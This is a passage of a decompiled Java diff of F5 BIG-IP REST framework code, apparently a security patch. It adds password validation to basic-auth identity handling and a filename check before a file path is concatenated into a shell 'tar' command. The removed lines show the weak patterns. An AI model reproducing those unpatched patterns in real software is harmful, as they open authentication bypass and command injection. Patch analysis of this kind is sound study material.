}\n \n \n \n \n \n public RestOperation setSenderNote(String value) {\n this.senderNote = value;\n return this;\n }\n \n public String getSenderNote() {\n return this.senderNote;\n }\n \n \n \n \n public RestOperation setGossipHeader(String value) {\n this.gossipHeader = value;\n return this;\n }\n \n public String getGossipHeader() {\n return this.gossipHeader;\n }\n \n public void complete() {\n if (this.completionCount.incrementAndGet() > 1) {\n if (this.statusCode < 400)\n {\n \n \n LOGGER.fine(RestHelper.throwableStackToString(new IllegalStateException(String.format(\"Already completed:Referer:%s, target:%s\", new Object[] { this.referer, this.uri }))));\n }\n \n \n return;\n }\n \n if (this.completion == null) {\n return;\n }\n \n try {\n if (this.statusCode >= 400) {\n IllegalStateException ise = new IllegalStateException(String.format(\"complete() of %s %s from %s %s called with incompatible status code %s so redirecting to failed()\", new Object[] { getMethod(), getUri(), getReferer(), getRemoteSender(), Integer.valueOf(this.statusCode) }));\n \n \n \n \n this.completion.failed(ise, this);\n LOGGER.warning(RestHelper.throwableStackToString(ise));\n return;\n }\n } catch (Exception e) {\n LOGGER.warningFmt(\"Exception in %s %s failure handler: %s\", new Object[] { getMethod(), getUri(), RestHelper.throwableStackToString(e) });\n \n return;\n }\n \n try {\n this.completion.completed(this);\n } catch (Exception e) {\n try {\n LOGGER.fineFmt(\"Failed attempting to complete a successful %s %s request: %s\", new Object[] { getMethod(), getUri(), RestHelper.throwableStackToString(e) });\n \n Exception ex = RestHelper.convertToException(e);\n this.completion.failed(ex, this);\n } catch (Exception eInsideFail) {\n LOGGER.warningFmt(\"Exception in %s %s failed. t: %s tInsideFail: %s\", new Object[] { getMethod(), getUri(), RestHelper.throwableStackToString(e), RestHelper.throwableStackToString(eInsideFail) });\n }\n }\n }\n \n \n \n public void fail(Exception ex, RestErrorResponse err) {\n fail(ex, err, false);\n }\n \n public void fail(Exception ex, RestErrorResponse err, boolean allowExternalStackTrace) {\n try {\n String existingBody = getBodyAsString();\n \n boolean excludeStack = (!allowExternalStackTrace && isRequestExternal());\n \n err.setOriginalRequestBody(existingBody).setCode(this.statusCode).setErrorStack(excludeStack ? null : RestHelper.throwableStackToList(ex)).setReferer(this.referer).setRestOperationId(this.id);\n \n \n \n \n setBody(err);\n } finally {\n fail(ex);\n }\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public void fail(Throwable throwable) {\n fail(throwable, false);\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public void fail(Throwable throwable, boolean allowExternalStackTrace) {\n if (this.completionCount.incrementAndGet() > 1) {\n return;\n }\n \n if (this.completion == null) {\n return;\n }\n \n if (throwable == null) {\n throwable = new IllegalArgumentException(\"request failed with null exception\");\n }\n \n Exception ex = null;\n try {\n if (this.statusCode == 200 || this.statusCode == 202) {\n \n this.statusCode = 400;\n if (throwable instanceof RestWorkerUriNotFoundException) {\n this.statusCode = 404;\n }\n }\n \n if (generateRestErrorResponse()) {\n setErrorResponseBody(throwable, allowExternalStackTrace);\n }\n \n JsonElement jsonBody = getParsedBody();\n if (jsonBody != null && jsonBody instanceof JsonObject) {\n JsonObject jsonObject = (JsonObject)jsonBody;\n if (jsonObject != null) {\n Set<Map.Entry<String, JsonElement>> entries = jsonObject.entrySet();\n boolean setDescription = false;\n - for (Map.Entry<String, JsonElement> current : entries) {\n + for (Iterator<Map.Entry<String, JsonElement>> iter = entries.iterator(); iter.hasNext(); ) {\n + Map.Entry<String, JsonElement> current = iter.next();\n if (current.getValue() != null && RestWorker.isHtmlTagExists(((JsonElement)current.getValue()).toString())) {\n jsonObject.addProperty(current.getKey(), \"HTML Tag-like Content in the Request URL/Body\");\n setBody(jsonObject.toString());\n LOGGER.fine(\"tag-like content on respone with key \" + (String)current.getKey());\n }\n \n \n - if (((String)current.getKey()).toString().equals(\"code\") && (((JsonElement)current.getValue()).toString().equals(\"400\") || ((JsonElement)current.getValue()).toString().equals(\"500\"))) {\n -\n + if (((String)current.getKey()).toString().equals(\"code\") && Integer.parseInt(((JsonElement)current.getValue()).toString()) >= 400) {\n \n setDescription = true; continue;\n } if (setDescription && ((String)current.getKey()).toString().equals(\"originalRequestBody\")) {\n \n - jsonObject.remove(current.getKey());\n + iter.remove();\n setBody(jsonObject.toString());\n setDescription = false;\n LOGGER.fine(\"Cleared the request content for key \" + (String)current.getKey());\n }\n }\n }\n }\n ex = RestHelper.convertToException(throwable);\n } catch (Exception e2) {\n LOGGER.warningFmt(\"Unable to generate error body for %s %s %s: %s\", new Object[] { getMethod(), getUri(), Integer.valueOf(getStatusCode()), RestHelper.throwableStackToString(e2) });\n } finally {\n \n try {\n this.completion.failed(ex, this);\n } catch (Exception e3) {\n LOGGER.warningFmt(\"failure handler for %s %s %s threw unexpectedly: %s\", new Object[] { getMethod(), getUri(), Integer.valueOf(getStatusCode()), RestHelper.throwableStackToString(e3) });\n }\n }\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public void setErrorResponseBody(Throwable t) {\n setErrorResponseBody(t, false);\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public void setErrorResponseBody(Throwable t, boolean allowExternalStackTrace) {\n if (t == null)\n {\n t = new IllegalArgumentException(\"Expected exception was null\");\n }\n \n boolean excludeStack = (!allowExternalStackTrace && isRequestExternal());\n \n String existingBody = getBodyAsString();\n if (existingBody == null || existingBody.isEmpty()) {\n \n setBody(RestErrorResponse.create().setCode(this.statusCode).setMessage(t.getLocalizedMessage()).setReferer(this.referer).setRestOperationId(this.id).setErrorStack(excludeStack ? null : RestHelper.throwableStackToList(t)));\n \n \n \n return;\n }\n \n \n \n try {\n boolean isValidErrorResponse = false;\n \n \n Object errorResponse = getBody(RestErrorResponse.class);\n if (errorResponse instanceof RestErrorResponse) {\n RestErrorResponse restErrorResponse = (RestErrorResponse)errorResponse;\n isValidErrorResponse = (restErrorResponse.getCode() != 0L || restErrorResponse.getOriginalRequestBody() != null || restErrorResponse.getMessage() != null);\n }\n \n \n \n \n errorResponse = getBody(RestODataErrorResponse.class);\n if (!isValidErrorResponse && errorResponse instanceof RestODataErrorResponse) {\n RestODataErrorResponse oDataErrorResponse = (RestODataErrorResponse)errorResponse;\n isValidErrorResponse = (oDataErrorResponse.getError() != null && oDataErrorResponse.getError().getCode() != 0);\n }\n \n \n if (excludeStack) {\n existingBody = cleanStackTrace(existingBody);\n setBody(existingBody);\n }\n \n \n if (!isValidErrorResponse) {\n setBody(RestErrorResponse.create().setCode(this.statusCode).setOriginalRequestBody(existingBody).setMessage(t.getLocalizedMessage()).setReferer(this.referer).setRestOperationId(this.id).setErrorStack(excludeStack ? null : RestHelper.throwableStackToList(t)));\n \n \n \n }\n \n \n }\n catch (Exception jsonException) {\n t.addSuppressed(jsonException);\n \n \n setBody(RestErrorResponse.create().setCode(this.statusCode).setMessage(t.getLocalizedMessage()).setOriginalRequestBody(existingBody).setReferer(this.referer).setRestOperationId(this.id).setErrorStack(excludeStack ? null : RestHelper.throwableStackToList(t)));\n }\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n public static String cleanStackTrace(String json) {\n if (json != null && json.contains(\"errorStack\")) {\n json = json.replaceAll(\"(?s)(\\\"errorStack\\\"|errorStack)(\\\\s*):(\\\\s*)\\\\[.*]\", \"$1$2:$3[]\");\n }\n \n \n return json;\n }\n \n private boolean isRequestExternal() {\n boolean isExternal = true;\n \n try {\n isExternal = RestStatic.isExternalRequest(this);\n } catch (Exception e) {\n \n LOGGER.severe(\"Unable to determine if request is external: \" + e.getMessage());\n }\n \n return isExternal;\n }\n \n \n \n \n \n public Object clone() {\n RestOperation copy = new RestOperation();\n copy.completion = this.completion;\n copy.retriesRemaining = this.retriesRemaining;\n copy.parameters.putAll(this.parameters);\n copy.uri = (this.uri == null) ? null : URI.create(this.uri.toString());\n copy.expiration = new Date(this.expiration.getTime());\n copy.method = this.method;\n copy.accept = this.accept;\n copy.allow = this.allow;\n copy.resourceDeprecated = this.resourceDeprecated;\n copy.resourceEarlyAccess = this.resourceEarlyAccess;\n copy.propertyDeprecated = this.propertyDeprecated;\n copy.propertyEarlyAccess = this.propertyEarlyAccess;\n copy.xF5ConfigApiStatus = this.xF5ConfigApiStatus;\n copy.contentType = this.contentType;\n copy.contentDisposition = this.contentDisposition;\n copy.body = this.body;\n copy.binaryBody = this.binaryBody;\n copy.contentLength = this.contentLength;\n copy.contentRange = this.contentRange;\n copy.serverCertificateChain = this.serverCertificateChain;\n copy.isForceSocketEnabled = this.isForceSocketEnabled;\n copy.isRollbackRequest = this.isRollbackRequest;\n copy.restOperationFlags = EnumSet.copyOf(this.restOperationFlags);\n copy.statusCode = this.statusCode;\n if (this.authorizationData != null) {\n copy.authorizationData = new AuthorizationData();\n copy.authorizationData.basicAuthValue = this.authorizationData.basicAuthValue;\n copy.authorizationData.xAuthToken = this.authorizationData.xAuthToken;\n copy.authorizationData.xF5AuthTokenState = (this.authorizationData.xF5AuthTokenState == null) ? null : RestHelper.<AuthTokenItemState>copy(this.authorizationData.xF5AuthTokenState);\n \n \n copy.authorizationData.wwwAuthenticate = this.authorizationData.wwwAuthenticate;\n }\n if (this.identityData != null) {\n copy.identityData = new IdentityData();\n copy.identityData.userName = this.identityData.userName;\n if (!RestReference.isNullOrEmpty(this.identityData.userReference)) {\n URI uriCopy = URI.create(this.identityData.userReference.link.toString());\n copy.identityData.userReference = new RestReference(uriCopy);\n }\n if (this.identityData.groupReferences != null) {\n copy.identityData.groupReferences = new RestReference[this.identityData.groupReferences.length];\n \n for (int i = 0; i < this.identityData.groupReferences.length; i++) {\n if (!RestReference.isNullOrEmpty(this.identityData.groupReferences[i])) {\n \n \n URI uriCopy = URI.create((this.identityData.groupReferences[i]).link.toString());\n copy.identityData.groupReferences[i] = new RestReference(uriCopy);\n }\n }\n }\n } copy.transferEncoding = this.transferEncoding;\n copy.sourceAddress = this.sourceAddress;\n copy.referer = this.referer;\n copy.coordinationId = this.coordinationId;\n copy.xForwardedFor = this.xForwardedFor;\n copy.identifiedGroupName = this.identifiedGroupName;\n copy.isTrustedRequest = this.isTrustedRequest;\n \n \n \n copy.isConnectionCloseRequested = this.isConnectionCloseRequested;\n copy.isConnectionKeepAlive = this.isConnectionKeepAlive;\n \n if (RestHelper.getOperationTracingLevel().intValue() <= Level.FINER.intValue()) {\n \n copy.responseHeadersTrace = this.responseHeadersTrace;\n copy.requestHeadersTrace = this.requestHeadersTrace;\n }\n \n if (this.additionalHeaders != null && this.additionalHeaders[0] != null) {\n copy.allocateHttpHeaders();\n copy.additionalHeaders[Direction.REQUEST.getIndex()] = (HttpHeaderFields)this.additionalHeaders[Direction.REQUEST.getIndex()].clone();\n }\n \n \n if (this.additionalHeaders != null && this.additionalHeaders[1] != null) {\n copy.allocateHttpHeaders();\n copy.additionalHeaders[Direction.RESPONSE.getIndex()] = (HttpHeaderFields)this.additionalHeaders[Direction.RESPONSE.getIndex()].clone();\n }\n \n \n \n copy.isRestErrorResponseRequired = this.isRestErrorResponseRequired;\n copy.isPublicRequest = this.isPublicRequest;\n copy.senderNote = this.senderNote;\n copy.gossipHeader = this.gossipHeader;\n \n \n \n return copy;\n }\n \n \n \n \n \n \n \n \n public static String toJson(Object src) {\n return gson.toJson(src);\n }\n \n \n \n \n \n \n \n \n public static JsonElement toJsonTree(String src) {\n return (new JsonParser()).parse(src);\n }\n \n \n \n \n \n \n \n \n public static JsonElement toJsonTree(Object src) {\n return gson.toJsonTree(src);\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public static String toJsonWithEnumValues(Object src) {\n return extendedGson.toJson(src);\n }\n \n \n \n \n \n \n \n \n \n public static <T> T fromJson(String json, Class<T> classOfT) throws JsonSyntaxException {\n return (T)gson.fromJson(json, classOfT);\n }\n \n \n \n \n \n \n \n \n \n public static <T> T fromJson(Reader json, Class<T> classOfT) throws JsonSyntaxException {\n return (T)gson.fromJson(json, classOfT);\n }\n \n \n \n \n \n \n \n \n \n \n \n public static <T> T fromJson(JsonElement parsedJson, Class<T> classOfT) throws JsonSyntaxException {\n return (T)gson.fromJson(parsedJson, classOfT);\n }\n \n \n \n \n \n \n \n \n \n \n public static <T> T fromObject(Object src, Class<T> classOfT) throws JsonSyntaxException {\n return (T)gson.fromJson(gson.toJson(src), classOfT);\n }\n \n \n \n \n \n \n \n \n public RestOperation nestCompletion(final RestRequestCompletion beforeCompletion) {\n final RestRequestCompletion original = this.completion;\n RestRequestCompletion wrapper = new RestRequestCompletion()\n {\n public void completed(RestOperation request)\n {\n request.resetCompletionCount();\n request.setCompletion(original);\n beforeCompletion.completed(RestOperation.this);\n }\n \n \n public void failed(Exception ex, RestOperation request) {\n request.resetCompletionCount();\n request.setCompletion(original);\n beforeCompletion.failed(ex, request);\n }\n };\n \n return setCompletion(wrapper);\n }\n }\n diff --git a/com/f5/rest/common/RestOperationIdentifier.java b/com/f5/rest/common/RestOperationIdentifier.java\n index d7941ba..cf955b9 100644\n --- a/com/f5/rest/common/RestOperationIdentifier.java\n +++ b/com/f5/rest/common/RestOperationIdentifier.java\n @@ -1,249 +1,334 @@\n package com.f5.rest.common;\n \n +import com.f5.rest.tmos.bigip.authn.providers.mcpremote.TmosAuthProviderCollectionWorker;\n import com.f5.rest.workers.AuthTokenItemState;\n +import com.f5.rest.workers.ForwarderPassThroughWorker;\n +import com.f5.rest.workers.authn.providers.AuthProviderLoginState;\n import com.f5.rest.workers.authz.AuthzHelper;\n import com.f5.rest.workers.device.DeviceCertificateState;\n import java.net.URI;\n +import java.net.URISyntaxException;\n import java.security.interfaces.RSAPublicKey;\n \n \n \n \n \n \n \n \n \n +\n +\n +\n +\n +\n +\n public class RestOperationIdentifier\n {\n private static RestLogger LOGGER = new RestLogger(RestOperationIdentifier.class, null);\n \n + static final String TMOS_AUTH_LOGIN_PROVIDER_WORKER_URI_PATH = TmosAuthProviderCollectionWorker.WORKER_URI_PATH + \"/\" + TmosAuthProviderCollectionWorker.generatePrimaryKey(\"tmos\") + \"/login\";\n +\n +\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public static void setIdentityFromAuthenticationData(RestOperation request, Runnable completion) {\n if (setIdentityFromDeviceAuthToken(request, completion)) {\n return;\n }\n if (setIdentityFromF5AuthToken(request)) {\n completion.run();\n return;\n }\n - if (setIdentityFromBasicAuth(request)) {\n - completion.run();\n -\n + if (setIdentityFromBasicAuth(request, completion)) {\n return;\n }\n +\n completion.run();\n }\n \n \n \n \n \n \n \n \n public static void updateIdentityFromAuthenticationData(RestOperation request) {\n if (getRequestDeviceAuthToken(request) != null) {\n return;\n }\n \n \n if (setIdentityFromF5AuthToken(request)) {\n return;\n }\n - if (setIdentityFromBasicAuth(request)) {\n + if (setIdentityFromBasicAuth(request, null)) {\n return;\n }\n }\n \n \n \n \n private static String getRequestDeviceAuthToken(RestOperation request) {\n return request.getParameter(\"em_server_auth_token\");\n }\n \n \n \n \n \n \n \n \n private static boolean setIdentityFromDeviceAuthToken(final RestOperation incomingRequest, final Runnable finalRunnable) {\n final String authToken = getRequestDeviceAuthToken(incomingRequest);\n if (authToken == null) {\n return false;\n }\n final String ipAddress = incomingRequest.getParameter(\"em_server_ip\");\n \n \n \n boolean isCmiKey = Boolean.parseBoolean(incomingRequest.getParameter(\"em_cmi_key\"));\n \n \n \n \n \n \n if (WellKnownPorts.getUseDeviceGroupKeyPairs() || WellKnownPorts.getUseBothDeviceAndGroupCertificates() || isCmiKey)\n {\n return setIdentityFromDeviceAuthTokenOnDisk(incomingRequest, finalRunnable, authToken, ipAddress, isCmiKey);\n }\n \n \n URI certificateUri = UrlHelper.buildLocalUriSafe(incomingRequest.getUri().getPort(), new String[] { \"shared/device-certificates\", ipAddress });\n \n \n \n RestRequestCompletion completion = new RestRequestCompletion()\n {\n public void completed(RestOperation certRequest) {\n DeviceCertificateState certificate = certRequest.<DeviceCertificateState>getTypedBody(DeviceCertificateState.class);\n \n RestOperationIdentifier.setIdentityFromDeviceAuthToken(authToken, certificate.certificate.getBytes(), certificate.deviceUserReference, incomingRequest);\n \n \n \n finalRunnable.run();\n }\n \n \n \n \n \n public void failed(Exception exception, RestOperation certRequest) {\n RestOperationIdentifier.LOGGER.fineFmt(\"Get device-certificate %s for %s: %s\", new Object[] { this.val$ipAddress, this.val$incomingRequest.getReferer(), exception });\n \n finalRunnable.run();\n }\n };\n \n RestOperation certRequest = RestOperation.create().setUri(certificateUri).setCompletion(completion).setReferer(RestOperationIdentifier.class.getName());\n \n \n \n RestRequestSender.sendGet(certRequest);\n return true;\n }\n \n \n \n \n \n \n \n private static boolean setIdentityFromDeviceAuthTokenOnDisk(final RestOperation incomingRequest, final Runnable finalRunnable, final String authToken, final String ipAddress, final boolean isCmiKey) {\n DeviceAuthTokenHelper.getPublicKeyBytes(ipAddress, isCmiKey, new CompletionHandler<byte[]>()\n {\n public void completed(byte[] data)\n {\n RestOperationIdentifier.setIdentityFromDeviceAuthToken(authToken, data, null, incomingRequest);\n finalRunnable.run();\n }\n \n \n \n \n public void failed(Exception exception, byte[] data) {\n RestOperationIdentifier.LOGGER.fineFmt(\"Read public key %s/%s for %s: %s\", new Object[] { this.val$ipAddress, Boolean.valueOf(this.val$isCmiKey), this.val$incomingRequest.getReferer(), exception });\n \n finalRunnable.run();\n }\n });\n \n return true;\n }\n \n \n \n \n \n \n \n \n \n \n \n \n private static void setIdentityFromDeviceAuthToken(String authToken, byte[] publicKeyBytes, RestReference deviceUserReference, RestOperation request) {\n RSAPublicKey publicKey;\n DeviceAuthToken deviceAuthToken;\n try {\n publicKey = DeviceAuthTokenHelper.makePublicKeyFromBytes(publicKeyBytes);\n } catch (Exception exception) {\n \n \n LOGGER.warningFmt(\"Public key file on disk error: %s\", new Object[] { RestHelper.throwableStackToString(exception) });\n \n \n return;\n }\n \n try {\n deviceAuthToken = DeviceAuthTokenHelper.decryptAuthToken(authToken, publicKey);\n } catch (Exception exception) {\n LOGGER.fineFmt(\"Invalid auth token %s from %s: %s\", new Object[] { authToken, request.getReferer(), exception });\n \n return;\n }\n \n LOGGER.finestFmt(\"token timestamp=%s\", new Object[] { Integer.valueOf(deviceAuthToken.getTimestamp()) });\n \n if (deviceUserReference == null) {\n deviceUserReference = AuthzHelper.getDefaultAdminReference();\n }\n request.setIdentityData(null, deviceUserReference, null);\n \n \n request.setTrustedRequest(true);\n }\n \n \n \n \n private static boolean setIdentityFromF5AuthToken(RestOperation request) {\n AuthTokenItemState token = request.getXF5AuthTokenState();\n if (token == null) {\n return false;\n }\n request.setIdentityData(token.userName, token.user, AuthzHelper.toArray(token.groupReferences));\n \n return true;\n }\n \n \n \n \n - private static boolean setIdentityFromBasicAuth(RestOperation request) {\n +\n +\n + private static boolean setIdentityFromBasicAuth(final RestOperation request, final Runnable runnable) {\n String authHeader = request.getBasicAuthorization();\n if (authHeader == null) {\n return false;\n }\n - AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n - request.setIdentityData(components.userName, null, null);\n + final AuthzHelper.BasicAuthComponents components = AuthzHelper.decodeBasicAuth(authHeader);\n +\n +\n +\n +\n +\n + String xForwardedHostHeaderValue = request.getAdditionalHeader(\"X-Forwarded-Host\");\n +\n +\n +\n + if (xForwardedHostHeaderValue == null) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n +\n +\n + String[] valueList = xForwardedHostHeaderValue.split(\", \");\n + int valueIdx = (valueList.length > 1) ? (valueList.length - 1) : 0;\n + if (valueList[valueIdx].contains(\"localhost\") || valueList[valueIdx].contains(\"127.0.0.1\")) {\n +\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n +\n + if (!PasswordUtil.isPasswordReset().booleanValue()) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + return true;\n + }\n +\n + AuthProviderLoginState loginState = new AuthProviderLoginState();\n + loginState.username = components.userName;\n + loginState.password = components.password;\n + loginState.address = request.getRemoteSender();\n + RestRequestCompletion authCompletion = new RestRequestCompletion()\n + {\n + public void completed(RestOperation subRequest) {\n + request.setIdentityData(components.userName, null, null);\n + if (runnable != null) {\n + runnable.run();\n + }\n + }\n +\n +\n + public void failed(Exception ex, RestOperation subRequest) {\n + RestOperationIdentifier.LOGGER.warningFmt(\"Failed to validate %s\", new Object[] { ex.getMessage() });\n + if (ex.getMessage().contains(\"Password expired\")) {\n + request.fail(new SecurityException(ForwarderPassThroughWorker.CHANGE_PASSWORD_NOTIFICATION));\n + }\n + if (runnable != null) {\n + runnable.run();\n + }\n + }\n + };\n +\n + try {\n + RestOperation subRequest = RestOperation.create().setBody(loginState).setUri(UrlHelper.makeLocalUri(new URI(TMOS_AUTH_LOGIN_PROVIDER_WORKER_URI_PATH), null)).setCompletion(authCompletion);\n +\n +\n + RestRequestSender.sendPost(subRequest);\n + } catch (URISyntaxException e) {\n + LOGGER.warningFmt(\"ERROR: URISyntaxEception %s\", new Object[] { e.getMessage() });\n + }\n return true;\n }\n }\n diff --git a/com/f5/rest/tmos/bigip/access/iapp/IAppBundleInstallTaskCollectionWorker.java b/com/f5/rest/tmos/bigip/access/iapp/IAppBundleInstallTaskCollectionWorker.java\n index afc6890..7a0fe79 100644\n --- a/com/f5/rest/tmos/bigip/access/iapp/IAppBundleInstallTaskCollectionWorker.java\n +++ b/com/f5/rest/tmos/bigip/access/iapp/IAppBundleInstallTaskCollectionWorker.java\n @@ -1,788 +1,803 @@\n package com.f5.rest.tmos.bigip.access.iapp;\n \n import com.f5.rest.common.CompletionHandler;\n import com.f5.rest.common.RestHelper;\n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestThreadManager;\n import com.f5.rest.common.UrlHelper;\n import com.f5.rest.common.Utilities;\n import com.f5.rest.common.VersionUtil;\n import com.f5.rest.tmos.bigip.access.util.LangUtil;\n import com.f5.rest.workers.DeviceInfoState;\n import com.f5.rest.workers.device.DeviceInfoWorker;\n import com.f5.rest.workers.iapp.IAppPackageManagementTaskCollectionWorker;\n import com.f5.rest.workers.iapp.IAppPackageManagementTaskState;\n import com.f5.rest.workers.iapp.packaging.GlobalInstalledPackageCollectionWorker;\n import com.f5.rest.workers.iapp.packaging.InstalledPackageCollectionState;\n import com.f5.rest.workers.iapp.packaging.InstalledPackageState;\n import com.f5.rest.workers.shell.ShellExecutionResult;\n import com.f5.rest.workers.shell.ShellExecutor;\n import com.f5.rest.workers.task.AbstractTaskCollectionWorker;\n import com.f5.rest.workers.task.TaskCompletion;\n import com.f5.rest.workers.task.TaskItemState;\n import com.google.gson.JsonObject;\n import java.io.ByteArrayInputStream;\n import java.io.File;\n import java.io.IOException;\n import java.io.InputStream;\n import java.io.InputStreamReader;\n import java.net.URI;\n import java.nio.ByteBuffer;\n import java.nio.channels.AsynchronousFileChannel;\n import java.nio.channels.CompletionHandler;\n import java.nio.file.OpenOption;\n import java.nio.file.Path;\n import java.nio.file.Paths;\n import java.nio.file.StandardOpenOption;\n import java.util.ArrayList;\n import java.util.Date;\n import java.util.concurrent.TimeUnit;\n +import java.util.regex.Matcher;\n +import java.util.regex.Pattern;\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n public class IAppBundleInstallTaskCollectionWorker\n extends AbstractTaskCollectionWorker<IAppBundleInstallTaskState, IAppBundleInstallCollectionState>\n {\n private static final String AGC_USE_CASE_PACK_BUILD_NOT_FOUND = \"Access Guided Configuration use case pack name does not contain build number\";\n private static final String AGC_PACK_NOT_FOUND = \"Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.\";\n public static final String IAPP_BUNDLE_INSTALL_TASKS_SEGMENT = \"bundle-install-tasks\";\n public static final String WORKER_URI_PATH = UrlHelper.buildUriPath(new String[] { \"tm/\", \"access\", \"bundle-install-tasks\" });\n \n \n private static final String ERROR_TASK_BODY_INVALID = \"IApp bundle install task body is invalid.\";\n \n +\n private static final String TAR_FILE_PATH = \"/var/apm/f5-iappslx-agc-usecase-pack/\";\n \n private static final String RPMS_FILE_PATH = \"/var/config/rest/downloads/\";\n \n private static final String FRAMEWORK = \"framework\";\n \n private static final String AGC_USECASE_PACK_INFO_WORKER_URI_PATH = \"/mgmt/tm/access/usecase-pack-info\";\n \n private static final String AGC_USE_CASE_PACK_VERSION = \"usecasePackVersion\";\n \n private static final String AGC_USE_CASE_PACK_BUILD = \"usecasePackBuild\";\n \n private String bigIpVersion;\n \n private static final int MAX_RETRY_COUNT = 5;\n \n private static final int RETRY_WAIT_TIME_MULTIPLIER = 5000;\n \n + private static final Pattern validFilePathChars = Pattern.compile(\"(^[a-zA-Z][a-zA-Z0-9_.\\\\-\\\\s()]*)\\\\.([tT][aA][rR]\\\\.[gG][zZ])$\");\n \n public IAppBundleInstallTaskCollectionWorker() {\n super(IAppBundleInstallTaskState.class, IAppBundleInstallCollectionState.class);\n \n \n this.state = new IAppBundleInstallCollectionState();\n \n \n \n setReplicated(false);\n \n setIndexed(true);\n \n \n \n \n \n \n \n \n \n setIsObliteratedOnDelete(true);\n \n configureTaskJanitor(TimeUnit.HOURS.toMillis(1L), TimeUnit.DAYS.toMillis(1L));\n }\n \n \n \n \n public void onStart(RestServer server) {\n completeStart(IAppBundleInstallCollectionState.class, new URI[] { buildLocalUri(new String[] { IAppPackageManagementTaskCollectionWorker.WORKER_URI_PATH }) });\n }\n \n \n \n \n \n \n \n \n public void validateTaskRequest(IAppBundleInstallTaskState taskState) throws Exception {\n if (taskState == null) {\n throw new IllegalArgumentException(\"IApp bundle install task body is invalid.\");\n }\n }\n \n \n \n \n \n protected void startTask(IAppBundleInstallTaskState taskState) {\n taskState.status = TaskItemState.Status.STARTED;\n if (taskState.startTime == null) {\n taskState.startTime = new Date();\n }\n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.VALIDATE_GZIP_BUNDLE;\n sendStatusUpdate(taskState);\n }\n \n \n \n \n \n public void processTaskStep(IAppBundleInstallTaskState taskState, Object userData) {\n int retryCount;\n switch (taskState.step) {\n case VALIDATE_GZIP_BUNDLE:\n validateGzipBundle(taskState);\n return;\n case QUERY_INSTALLED_RPM:\n queryInstalledRpm(taskState);\n return;\n case QUERY_BIGIP_VERSION:\n queryBigipVersion(taskState);\n return;\n case EXTRACT_RPMS_FROM_BUNDLE:\n extractRpmsFromBundle(taskState);\n return;\n case READ_MANIFEST_FILE:\n readManifestFile(taskState);\n return;\n case FILTER_RPMS_ON_MIN_BIGIP_VERSION_REQUIRED:\n filterRpmsOnMinBigipVersionRequired(taskState);\n return;\n case INSTALL_FRAMEWORK_RPM:\n installFrameworkRpmInBundle(taskState);\n return;\n case INSTALL_APP_RPMS:\n installAppRpmsInBundle(taskState);\n return;\n case UPDATE_USECASE_PACK_VERSION:\n retryCount = 0;\n if (userData != null) {\n retryCount = ((Integer)userData).intValue();\n }\n updateUsecasePackVersion(taskState, retryCount);\n return;\n case DONE:\n taskState.status = TaskItemState.Status.FINISHED;\n sendStatusUpdate(taskState);\n return;\n }\n throw new IllegalStateException(\"Unknown IApp bundle install task step: \" + taskState.step);\n }\n \n \n \n \n \n private void validateGzipBundle(final IAppBundleInstallTaskState taskState) {\n if (Utilities.isNullOrEmpty(taskState.filePath)) {\n File agcUseCasePackDir = new File(\"/var/apm/f5-iappslx-agc-usecase-pack/\");\n if (!agcUseCasePackDir.exists() || !agcUseCasePackDir.isDirectory()) {\n String error = \"Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.\";\n failTask(taskState, error, \"\");\n return;\n }\n File[] agcUseCasePack = agcUseCasePackDir.listFiles();\n if (agcUseCasePack == null || agcUseCasePack.length == 0 || !agcUseCasePack[0].isFile()) {\n \n String error = \"Access Guided Configuration use case pack not found on BIG-IP. Please upload and install the pack.\";\n failTask(taskState, error, \"\");\n return;\n }\n taskState.filePath = agcUseCasePack[0].getPath();\n }\n \n + String filename = taskState.filePath.substring(taskState.filePath.lastIndexOf('/') + 1);\n + Matcher m = validFilePathChars.matcher(filename);\n + if (!m.matches()) {\n + String errorMessage = String.format(\"Access Guided Configuration use case pack validation failed: the file name %s must begin with alphabet, and only contain letters, numbers, spaces and/or special characters (underscore (_), period (.), hyphen (-) and round brackets ()). Only a .tar.gz file is allowed\", new Object[] { filename });\n +\n +\n +\n + failTask(taskState, errorMessage, \"\");\n +\n + return;\n + }\n final String extractTarCommand = \"tar -xf \" + taskState.filePath + \" -O > /dev/null\";\n \n \n ShellExecutor extractTar = new ShellExecutor(extractTarCommand);\n \n CompletionHandler<ShellExecutionResult> executionFinishedHandler = new CompletionHandler<ShellExecutionResult>()\n {\n public void completed(ShellExecutionResult extractQueryResult)\n {\n if (extractQueryResult.getExitStatus().intValue() != 0) {\n String error = extractTarCommand + \" failed with exit code=\" + extractQueryResult.getExitStatus();\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.\", error + \"stdout + stderr=\" + extractQueryResult.getOutput());\n \n \n return;\n }\n \n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.QUERY_INSTALLED_RPM;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception ex, ShellExecutionResult rpmQueryResult) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, \"Usecase pack validation failed. Please ensure that usecase pack is a valid tar archive.\", String.format(\"%s 